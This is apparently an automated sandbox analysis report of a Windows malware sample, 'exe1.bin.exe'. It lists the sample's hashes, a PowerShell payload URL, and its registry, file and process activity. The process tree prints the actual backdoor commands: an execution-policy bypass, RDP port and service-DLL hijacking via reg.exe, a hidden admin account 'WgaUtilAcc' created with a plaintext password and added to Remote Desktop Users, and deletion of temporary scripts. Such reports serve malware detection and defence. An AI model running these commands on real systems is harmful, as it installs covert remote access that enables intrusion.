Analysis
-
max time kernel
49s -
max time network
113s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
20-07-2021 09:16
Static task
static1
Behavioral task
behavioral1
Sample
exe1.bin.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
exe1.bin.exe
Resource
win10v20210410
General
-
Target
exe1.bin.exe
-
Size
4.6MB
-
MD5
eaee663dfeb2efcd9ec669f5622858e2
-
SHA1
2b96f0d568128240d0c53b2a191467fde440fd93
-
SHA256
6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2
-
SHA512
211951f053ddecc6e0545a83119112d6ad375e226437d6a26ed493b362e51da3718131d59fb045c9b2feea91e04d3b82e9be4e52a46fe2e84ed4f3b4ed2213b3
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 15 4704 powershell.exe 17 4704 powershell.exe 18 4704 powershell.exe 19 4704 powershell.exe 21 4704 powershell.exe 23 4704 powershell.exe 25 4704 powershell.exe 27 4704 powershell.exe 29 4704 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Loads dropped DLL 2 IoCs
Processes:
pid process 5072 5072 -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_kjkza3sr.cco.ps1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI4B29.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI4B2A.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI4B3A.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI4B4B.tmp powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_lish24en.kit.psm1 powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI4B09.tmp powershell.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exedescription ioc process Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 339704ea112ed701 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag," powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\ef29a4ec885fa451 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,User Agent," powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]" powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 17 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 18 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 19 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 21 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2416 powershell.exe 2416 powershell.exe 2416 powershell.exe 3872 powershell.exe 3872 powershell.exe 3872 powershell.exe 2008 powershell.exe 2008 powershell.exe 2008 powershell.exe 4224 powershell.exe 4224 powershell.exe 4224 powershell.exe 2416 powershell.exe 2416 powershell.exe 2416 powershell.exe 4704 powershell.exe 4704 powershell.exe 4704 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 624 624 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2416 powershell.exe Token: SeDebugPrivilege 3872 powershell.exe Token: SeIncreaseQuotaPrivilege 3872 powershell.exe Token: SeSecurityPrivilege 3872 powershell.exe Token: SeTakeOwnershipPrivilege 3872 powershell.exe Token: SeLoadDriverPrivilege 3872 powershell.exe Token: SeSystemProfilePrivilege 3872 powershell.exe Token: SeSystemtimePrivilege 3872 powershell.exe Token: SeProfSingleProcessPrivilege 3872 powershell.exe Token: SeIncBasePriorityPrivilege 3872 powershell.exe Token: SeCreatePagefilePrivilege 3872 powershell.exe Token: SeBackupPrivilege 3872 powershell.exe Token: SeRestorePrivilege 3872 powershell.exe Token: SeShutdownPrivilege 3872 powershell.exe Token: SeDebugPrivilege 3872 powershell.exe Token: SeSystemEnvironmentPrivilege 3872 powershell.exe Token: SeRemoteShutdownPrivilege 3872 powershell.exe Token: SeUndockPrivilege 3872 powershell.exe Token: SeManageVolumePrivilege 3872 powershell.exe Token: 33 3872 powershell.exe Token: 34 3872 powershell.exe Token: 35 3872 powershell.exe Token: 36 3872 powershell.exe Token: SeDebugPrivilege 2008 powershell.exe Token: SeIncreaseQuotaPrivilege 2008 powershell.exe Token: SeSecurityPrivilege 2008 powershell.exe Token: SeTakeOwnershipPrivilege 2008 powershell.exe Token: SeLoadDriverPrivilege 2008 powershell.exe Token: SeSystemProfilePrivilege 2008 powershell.exe Token: SeSystemtimePrivilege 2008 powershell.exe Token: SeProfSingleProcessPrivilege 2008 powershell.exe Token: SeIncBasePriorityPrivilege 2008 powershell.exe Token: SeCreatePagefilePrivilege 2008 powershell.exe Token: SeBackupPrivilege 2008 powershell.exe Token: SeRestorePrivilege 2008 powershell.exe Token: SeShutdownPrivilege 2008 powershell.exe Token: SeDebugPrivilege 2008 powershell.exe Token: SeSystemEnvironmentPrivilege 2008 powershell.exe Token: SeRemoteShutdownPrivilege 2008 powershell.exe Token: SeUndockPrivilege 2008 powershell.exe Token: SeManageVolumePrivilege 2008 powershell.exe Token: 33 2008 powershell.exe Token: 34 2008 powershell.exe Token: 35 2008 powershell.exe Token: 36 2008 powershell.exe Token: SeDebugPrivilege 4224 powershell.exe Token: SeIncreaseQuotaPrivilege 4224 powershell.exe Token: SeSecurityPrivilege 4224 powershell.exe Token: SeTakeOwnershipPrivilege 4224 powershell.exe Token: SeLoadDriverPrivilege 4224 powershell.exe Token: SeSystemProfilePrivilege 4224 powershell.exe Token: SeSystemtimePrivilege 4224 powershell.exe Token: SeProfSingleProcessPrivilege 4224 powershell.exe Token: SeIncBasePriorityPrivilege 4224 powershell.exe Token: SeCreatePagefilePrivilege 4224 powershell.exe Token: SeBackupPrivilege 4224 powershell.exe Token: SeRestorePrivilege 4224 powershell.exe Token: SeShutdownPrivilege 4224 powershell.exe Token: SeDebugPrivilege 4224 powershell.exe Token: SeSystemEnvironmentPrivilege 4224 powershell.exe Token: SeRemoteShutdownPrivilege 4224 powershell.exe Token: SeUndockPrivilege 4224 powershell.exe Token: SeManageVolumePrivilege 4224 powershell.exe Token: 33 4224 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
exe1.bin.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exedescription pid process target process PID 3968 wrote to memory of 2416 3968 exe1.bin.exe powershell.exe PID 3968 wrote to memory of 2416 3968 exe1.bin.exe powershell.exe PID 2416 wrote to memory of 2824 2416 powershell.exe csc.exe PID 2416 wrote to memory of 2824 2416 powershell.exe csc.exe PID 2824 wrote to memory of 1428 2824 csc.exe cvtres.exe PID 2824 wrote to memory of 1428 2824 csc.exe cvtres.exe PID 2416 wrote to memory of 3872 2416 powershell.exe powershell.exe PID 2416 wrote to memory of 3872 2416 powershell.exe powershell.exe PID 2416 wrote to memory of 2008 2416 powershell.exe powershell.exe PID 2416 wrote to memory of 2008 2416 powershell.exe powershell.exe PID 2416 wrote to memory of 4224 2416 powershell.exe powershell.exe PID 2416 wrote to memory of 4224 2416 powershell.exe powershell.exe PID 2416 wrote to memory of 4660 2416 powershell.exe reg.exe PID 2416 wrote to memory of 4660 2416 powershell.exe reg.exe PID 2416 wrote to memory of 4680 2416 powershell.exe reg.exe PID 2416 wrote to memory of 4680 2416 powershell.exe reg.exe PID 2416 wrote to memory of 4700 2416 powershell.exe reg.exe PID 2416 wrote to memory of 4700 2416 powershell.exe reg.exe PID 2416 wrote to memory of 4876 2416 powershell.exe net.exe PID 2416 wrote to memory of 4876 2416 powershell.exe net.exe PID 4876 wrote to memory of 4896 4876 net.exe net1.exe PID 4876 wrote to memory of 4896 4876 net.exe net1.exe PID 2416 wrote to memory of 4928 2416 powershell.exe cmd.exe PID 2416 wrote to memory of 4928 2416 powershell.exe cmd.exe PID 4928 wrote to memory of 4944 4928 cmd.exe cmd.exe PID 4928 wrote to memory of 4944 4928 cmd.exe cmd.exe PID 4944 wrote to memory of 4960 4944 cmd.exe net.exe PID 4944 wrote to memory of 4960 4944 cmd.exe net.exe PID 4960 wrote to memory of 4980 4960 net.exe net1.exe PID 4960 wrote to memory of 4980 4960 net.exe net1.exe PID 2416 wrote to memory of 5000 2416 powershell.exe cmd.exe PID 2416 wrote to memory of 5000 2416 powershell.exe cmd.exe PID 5000 wrote to memory of 5016 5000 cmd.exe cmd.exe PID 5000 wrote to memory of 5016 5000 cmd.exe cmd.exe PID 5016 wrote to memory of 5032 5016 cmd.exe net.exe PID 5016 wrote to memory of 5032 5016 cmd.exe net.exe PID 5032 wrote to memory of 5052 5032 net.exe net1.exe PID 5032 wrote to memory of 5052 5032 net.exe net1.exe PID 1920 wrote to memory of 4136 1920 cmd.exe net.exe PID 1920 wrote to memory of 4136 1920 cmd.exe net.exe PID 4136 wrote to memory of 4156 4136 net.exe net1.exe PID 4136 wrote to memory of 4156 4136 net.exe net1.exe PID 4176 wrote to memory of 1428 4176 cmd.exe net.exe PID 4176 wrote to memory of 1428 4176 cmd.exe net.exe PID 1428 wrote to memory of 2164 1428 net.exe net1.exe PID 1428 wrote to memory of 2164 1428 net.exe net1.exe PID 2344 wrote to memory of 2348 2344 cmd.exe net.exe PID 2344 wrote to memory of 2348 2344 cmd.exe net.exe PID 2348 wrote to memory of 4232 2348 net.exe net1.exe PID 2348 wrote to memory of 4232 2348 net.exe net1.exe PID 4324 wrote to memory of 4416 4324 cmd.exe net.exe PID 4324 wrote to memory of 4416 4324 cmd.exe net.exe PID 4416 wrote to memory of 4432 4416 net.exe net1.exe PID 4416 wrote to memory of 4432 4416 net.exe net1.exe PID 4452 wrote to memory of 4492 4452 cmd.exe net.exe PID 4452 wrote to memory of 4492 4452 cmd.exe net.exe PID 4492 wrote to memory of 4364 4492 net.exe net1.exe PID 4492 wrote to memory of 4364 4492 net.exe net1.exe PID 4328 wrote to memory of 4520 4328 cmd.exe net.exe PID 4328 wrote to memory of 4520 4328 cmd.exe net.exe PID 4520 wrote to memory of 4256 4520 net.exe net1.exe PID 4520 wrote to memory of 4256 4520 net.exe net1.exe PID 4536 wrote to memory of 4576 4536 cmd.exe WMIC.exe PID 4536 wrote to memory of 4576 4536 cmd.exe WMIC.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\exe1.bin.exe"C:\Users\Admin\AppData\Local\Temp\exe1.bin.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3968 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2416 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0oh2zeve\0oh2zeve.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:2824 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFF4.tmp" "c:\Users\Admin\AppData\Local\Temp\0oh2zeve\CSC73CAA211EA44F09634A317902A77D0.TMP"4⤵PID:1428
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3872 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2008 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4224 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:4660
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:4680 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:4700
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:4876 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:4896
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:4928 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:4944 -
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:4960 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:4980
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
PID:5000 -
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:5016 -
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:5032 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:5052
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:4248
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:2348
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
PID:1920 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
PID:4136 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:4156
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc a8OeqOZ0 /add1⤵
- Suspicious use of WriteProcessMemory
PID:4176 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc a8OeqOZ0 /add2⤵
- Suspicious use of WriteProcessMemory
PID:1428 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc a8OeqOZ0 /add3⤵PID:2164
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:2344 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:2348 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:4232
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:4324 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:4416 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD3⤵PID:4432
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:4452 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:4492 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:4364
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc a8OeqOZ01⤵
- Suspicious use of WriteProcessMemory
PID:4328 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc a8OeqOZ02⤵
- Suspicious use of WriteProcessMemory
PID:4520 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc a8OeqOZ03⤵PID:4256
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
- Suspicious use of WriteProcessMemory
PID:4536 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵PID:4576
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:4264
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵PID:2128
-
